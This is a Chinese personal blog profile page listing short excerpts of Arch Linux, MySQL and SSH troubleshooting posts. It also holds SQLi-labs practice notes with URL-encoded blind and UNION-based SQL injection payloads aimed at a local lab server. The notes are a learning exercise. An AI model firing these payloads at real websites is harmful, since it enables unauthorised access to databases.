自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(11)
  • 收藏
  • 关注

原创 archlinux 下面设置remnux虚拟机走代理

虚拟机代理

2022-07-22 16:58:29 528

原创 mysql 设置密码登录后,还可以用任意键登录 解决问题

UPDATE mysql.user SET plugin='mysql_native_password' WHERE user='root'; FLUSH PRIVILEGES; 成功执行以上代码后,退出mysql; 执行sudo mysql_secure_installation ,输入新设置的密码 重新登录即可解决问题

2022-03-23 13:56:48 1202

原创 Unable to negotiate with 47.98.49.44 port 22: no matching host key type found. Their offer: ssh-rsa

解决方案 $ cat ~/.ssh/config Host * HostkeyAlgorithms +ssh-rsa PubkeyAcceptedKeyTypes +ssh-rsa 参考链接:https://www.cnblogs.com/bbqblog/p/15524081.html

2022-03-15 10:21:48 1780

原创 BLACKARCH

在使用平铺式窗口管理器的时候,无法通过gui操作系统音量,这个时候按下tab键,或者是其他无意中按下打键的时候,系统会响起很大的beep声音,以下是方法。 sudo modprobe -r pcspkr 在配置文件里面加上,(没有就创建), /etc/modprobe.d/blacklist.conf 内容 blacklist pcspkr ...

2022-03-11 15:01:39 187

原创 archlinux - W3af

w3af 在archlinux下面报错没有 webkit 模块,使用包管理器yay -S pywebkitgtk 即可,如果有数字,数字pywebkitgtk2 或者pywebkitgtk2-bin都是可以的

2022-03-11 10:13:22 239

原创 sh: can‘t access tty: job control turned off - archlinux

ERROR: Root device mounted successfully, but /sbin/init does not exist. Bailing out, you are on your own now. Good luck. sh: can’t access tty: job control turned off [rootfs /]# _ 重新分盘,使用和硬盘相对的硬盘类型进行分盘 参考 https://www.viseator.com/2017/05/17/arch_install/

2022-03-07 10:17:41 846

原创 2021-08-28

SQL_LABS base 5 http://172.19.0.1:8888/Less-5/?id=1%27%20and%20length(database())%20=%208%20–%20 长度为8 http://172.19.0.1:8888/Less-5/?id=1%27%20and%20ascii(substr(database(),1,1))%20=%20115%20–%20 第一个字符ascii码为115 s http://172.19.0.1:8888/Less-5/?id=1%

2021-08-28 08:41:30 179

原创 2021-08-27

SQL_LABS base 4 http://172.19.0.1:8888/Less-4/?id=2%22)%20and%20length(database())=8%20–%20 获取当前数据库长度 http://172.19.0.1:8888/Less-4/?id=%22)%20union%20select%201,schema_name,3%20from%20information_schema.schemata%20limit%200,1–%20 获取数据库名 information_s

2021-08-27 15:48:09 110

原创 2021-08-27

SQL_LABS base 3 http://172.19.0.1:8888/Less-3/?id=1%27)%20and%20length(database())=8%20–%20 获得数据库长度 http://172.19.0.1:8888/Less-3/?id=%27)%20union%20select%201,schema_name,3%20from%20information_schema.schemata%20–%20 获取数据库名 information_schema http://1

2021-08-27 15:29:01 112

原创 2021-08-27

SQL_LAB base 2 http://172.19.0.1:8888/Less-2/?id=0%20%20union%20select%20schema_name,schema_name,schema_name%20from%20information_schema.schemata%20limit%200,1–%20 获得数据库名 http://172.19.0.1:8888/Less-2/?id=0%20%20union%20select%201,table_name,table_name%2

2021-08-27 15:09:14 108

原创 2021-08-27

sql_labs base 1 http://172.19.0.1:8888/Less-1/?id=1%27%20and%20length(database())=8%20–%20 数据库长度[ http://172.19.0.1:8888/Less-1/?id=1%27%20and%20ascii(substr(database(),1,1))=115%20–%20 s http://172.19.0.1:8888/Less-1/?id=1%27%20and%20ascii(substr(data

2021-08-27 14:37:45 185

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除